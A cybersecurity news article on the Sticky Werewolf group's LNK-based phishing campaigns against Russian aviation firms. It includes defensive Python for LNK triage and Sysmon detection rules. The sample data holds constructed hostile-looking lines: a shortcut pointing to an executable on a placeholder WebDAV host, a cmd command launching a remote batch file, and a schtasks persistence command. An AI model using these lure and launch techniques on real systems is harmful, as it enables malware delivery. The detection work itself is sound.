CyberSecurity SEE

The Sticky Werewolf: Weaponizing LNK Files to Attack Organizations

Sticky Werewolf, a notorious cyber threat group, has recently altered its modus operandi, moving away from phishing emails that carry download links to malicious files and towards a more sophisticated technique: archive attachments containing LNK files whose targets are malicious executables hosted on WebDAV servers.

When a recipient of one of these deceptive emails opens the LNK file, a chain of events is set in motion. First a batch script is triggered, which then launches an AutoIt script crafted to deliver the final payload. Because the shortcut itself starts this chain, there is no separate download step for the user to perform: the malware is delivered to the system as soon as the LNK file is executed.

The cyberespionage group, Sticky Werewolf, has set its sights on the aviation industry, employing phishing emails disguised as business invitations from a reputable Russian aerospace company, AO OKB Kristall. These emails contain an archive attachment housing two malicious LNK files masquerading as DOCX documents, along with a decoy PDF file to divert attention.

Clicking on the nefarious LNK files initiates a batch script that invokes an AutoIt script, culminating in the deployment of the final malicious payload. This marks a departure from Sticky Werewolf’s previous tactic of sending links that downloaded malware directly from file-sharing platforms, and it shows the group’s evolving sophistication and adaptability.
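The two lures described above share the same shape: a shortcut with a document-style double extension whose real target lives on a WebDAV server and runs a script or executable. The following is an added triage helper (example code, not from the article, Morphisec, or any vendor tool) that parses enough of the MS-SHLLINK .lnk format (ShellLinkHeader, LinkInfo, StringData) to recover the real target and command line of an attachment and flag exactly those traits. The `build_lnk` function only exists so the example can construct well-formed test files offline; the host names and file names in it are placeholders, not indicators from the campaign.

```python
"""LNK attachment triage: recover the real target of a shortcut and flag
document double extensions, network/WebDAV targets and executable targets."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
# CLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
EXEC_EXTENSIONS = (".exe", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".pif")
DOC_EXTENSIONS = (".docx", ".doc", ".pdf", ".xlsx", ".rtf")
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))


def _cstr(buf, off):
    """NUL-terminated ANSI string at buf[off] (LinkInfo paths are not UTF-16)."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    """Return header flags, the resolved target path and the StringData fields."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or CLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_IDLIST:          # skip the size-prefixed IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        li = pos
        li_size, _hdr, li_flags, _vol, base_off, net_off, suffix_off = struct.unpack_from("<7I", data, li)
        suffix = _cstr(data, li + suffix_off)
        if li_flags & 0x02:                     # CommonNetworkRelativeLink: \\server\share + suffix
            net_name_off = struct.unpack_from("<I", data, li + net_off + 8)[0]
            net_name = _cstr(data, li + net_off + net_name_off)
            target = net_name + ("\\" + suffix if suffix else "")
        elif li_flags & 0x01:                   # VolumeID + LocalBasePath + suffix
            target = _cstr(data, li + base_off) + suffix
        pos = li + li_size
    fields = {"flags": flags, "target": target}
    for name, bit in STRING_FIELDS:             # StringData: CountCharacters then chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return fields


def triage_lnk(filename, data):
    """Return the list of suspicious traits found in one shortcut attachment."""
    info = parse_lnk(data)
    findings = []
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else ""
    if stem.endswith(DOC_EXTENSIONS):
        findings.append("document double extension in file name")
    cmdline = (info["target"] + " " + info.get("arguments", "")).lower()
    if info["target"].startswith("\\\\") or any(m in cmdline for m in ("davwwwroot", "@ssl", "@80")):
        findings.append("target resolves to a network share or WebDAV path")
    if any(tok.strip('"').endswith(EXEC_EXTENSIONS) for tok in cmdline.split()):
        findings.append("target or arguments launch an executable or script")
    return findings


def build_lnk(target, arguments="", icon="", network=False):
    """Construct a minimal well-formed .lnk for testing (constructed sample, not real)."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0) | (HAS_ICON_LOCATION if icon else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    if network:                                  # \\server\share in NetName, remainder in CommonPathSuffix
        parts = target[2:].split("\\")
        net_name = ("\\\\" + "\\".join(parts[:2])).encode("latin-1") + b"\x00"
        netlink = struct.pack("<IIIII", 20 + len(net_name), 0, 20, 0, 0) + net_name
        body = netlink + "\\".join(parts[2:]).encode("latin-1") + b"\x00"
        li_hdr = [0x02, 0, 0, 28, 28 + len(netlink)]
    else:
        volume_id = struct.pack("<IIII", 17, 3, 0x1234ABCD, 16) + b"\x00"   # DRIVE_FIXED, empty label
        base = target.encode("latin-1") + b"\x00"
        body = volume_id + base + b"\x00"                                     # empty CommonPathSuffix
        li_hdr = [0x01, 28, 28 + len(volume_id), 0, 28 + len(volume_id) + len(base)]
    link_info = struct.pack("<7I", 28 + len(body), 28, *li_hdr) + body
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (arguments, icon) if s)
    return header + link_info + strings


if __name__ == "__main__":
    lure = build_lnk("\\\\webdav.example.invalid@80\\DavWWWRoot\\docs\\invite.exe", network=True)
    print(triage_lnk("invitation.docx.lnk", lure))
    print(triage_lnk("Report.lnk", build_lnk("C:\\Users\\analyst\\Documents\\Report.docx")))
```

The parser deliberately reads the target from LinkInfo rather than trusting the icon or file name, because the masquerade described above relies on the icon and the `.docx` stem while the LinkInfo still holds the real network path. Running `triage_lnk` over every `.lnk` extracted from an archive attachment at the mail gateway gives a cheap first filter; anything with two or more findings is worth detonating or blocking.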

Another facet of Sticky Werewolf’s clandestine operations targets enterprises associated with Russian helicopters through a deceptive phishing email carrying a decoy PDF attachment. The PDF references a video conference, and the email includes two disguised LNK files posing as meeting documents.

Executing these malicious LNK files triggers an NSIS self-extracting archive, a variant of the CypherIT crypter, to download and execute a malevolent executable from a network share. The extracted files are deposited into the Internet Explorer temporary files directory, after which a batch script is executed to further the malicious agenda.

The rogue LNK files, cloaked as Word documents, are designed to lure unsuspecting users into a trap. Clicking on either LNK file sets off a sequence of actions: a registry entry is manipulated so that a compromised WINWORD.exe starts persistently at every login, distracting error messages are displayed, and deceptive image files are copied to obscure the malware’s true intentions.

To avoid detection, a batch script within the LNK file selectively delays execution in the presence of specific antivirus processes and dynamically renames files. The script ultimately merges a legitimate AutoIt executable with a malicious script to execute them covertly, evading security measures.

The malicious AutoIt script is engineered to elude detection mechanisms, establish persistence, and thwart analysis environments and debugging tools. It loads a clean copy of ntdll.dll to bypass user-mode hooking, gains persistence by creating scheduled tasks or modifying the startup directory, and decrypts the hidden payload with a two-stage RC4 process keyed by a user-defined passphrase.

Morphisec reports that the decrypted payload is decompressed and injected into a legitimate AutoIt process via process hollowing, which makes it exceedingly challenging to detect on disk. This stealthy infiltration technique underscores the sophisticated tactics Sticky Werewolf employs in orchestrating its malevolent activities.
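Even with the payload hollowed into a legitimate AutoIt process, the chain described from the batch script onward leaves ordinary process-creation telemetry behind. The following is an added example (not from the article or from Morphisec) of a small rule pass over constructed Sysmon-style Event ID 1 records, catching the behaviours the article attributes to the chain: a shortcut resolving straight into a batch script on a network share, a binary executing out of the Internet Explorer temporary files (INetCache) directory, an AutoIt interpreter started by a shell or under a renamed image, and persistence set through schtasks. Field names mirror Sysmon; every event, path and host name here is a constructed placeholder.

```python
"""Process-creation rules for the LNK -> batch -> AutoIt chain, run over
constructed Sysmon-style events (not real telemetry)."""
import ntpath

AUTOIT_NAMES = {"autoit3.exe", "autoit3_x64.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def _base(path):
    """Lower-cased file name of an image path, quotes stripped."""
    return ntpath.basename(path.strip('"')).lower()


def rule_lnk_to_batch(ev):
    """explorer.exe resolving a shortcut directly into cmd.exe running a .bat from a UNC or WebDAV path."""
    cl = ev["CommandLine"].lower()
    return (_base(ev["ParentImage"]) == "explorer.exe" and _base(ev["Image"]) == "cmd.exe"
            and ".bat" in cl and ("\\\\" in cl or "davwwwroot" in cl))


def rule_inetcache_exec(ev):
    """Any process whose image lives under the IE temporary files cache."""
    image = ev["Image"].lower()
    return "\\inetcache\\" in image or "\\temporary internet files\\" in image


def rule_autoit_launch(ev):
    """AutoIt interpreter (recognised by OriginalFileName, which survives renaming)
    started by a shell or running under a name other than its own."""
    orig = ev.get("OriginalFileName", "").lower()
    return orig in AUTOIT_NAMES and (_base(ev["ParentImage"]) == "cmd.exe" or _base(ev["Image"]) != orig)


def rule_schtasks_persistence(ev):
    """schtasks /create issued by a parent running from a user-writable location."""
    parent = ev["ParentImage"].lower()
    return (_base(ev["Image"]) == "schtasks.exe" and "/create" in ev["CommandLine"].lower()
            and any(p in parent for p in USER_WRITABLE))


RULES = [rule_lnk_to_batch, rule_inetcache_exec, rule_autoit_launch, rule_schtasks_persistence]


def evaluate(events):
    """Return (ProcessId, rule name) pairs for every rule that matches an event."""
    return [(ev["ProcessId"], rule.__name__) for ev in events for rule in RULES if rule(ev)]


# Constructed sample events modelled on the chain in the article; placeholder paths and hosts.
CACHE = "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\INetCache\\"
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": 'cmd.exe /c "\\\\webdav.example.invalid@80\\DavWWWRoot\\docs\\invite.bat"'},
    {"ProcessId": 4102, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": CACHE + "wwwr.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": '"' + CACHE + 'wwwr.exe"'},
    {"ProcessId": 4103, "ParentImage": CACHE + "wwwr.exe",
     "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /tn "Update" /tr "' + CACHE + 'wwwr.exe" /sc onlogon'},
    {"ProcessId": 4104, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\user\\Documents\\agenda.docx"'},
]

if __name__ == "__main__":
    for pid, rule in evaluate(SAMPLE_EVENTS):
        print(pid, rule)
```

The AutoIt rule keys on `OriginalFileName` rather than the image name precisely because the batch script in this chain renames files on the fly; the version resource inside the legitimate interpreter is what the renamed copy still carries. Each rule on its own is noisy in some environments, so the useful signal is two or more of them firing in one parent-child lineage within a short window.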

In conclusion, Sticky Werewolf’s shift to sophisticated techniques built around deceptive LNK files shows the group’s relentless pursuit of evading detection and maximizing the impact of its cyber attacks. As organizations grapple with increasingly sophisticated threats, it is imperative to remain vigilant and adopt robust cybersecurity measures to safeguard against such insidious campaigns.
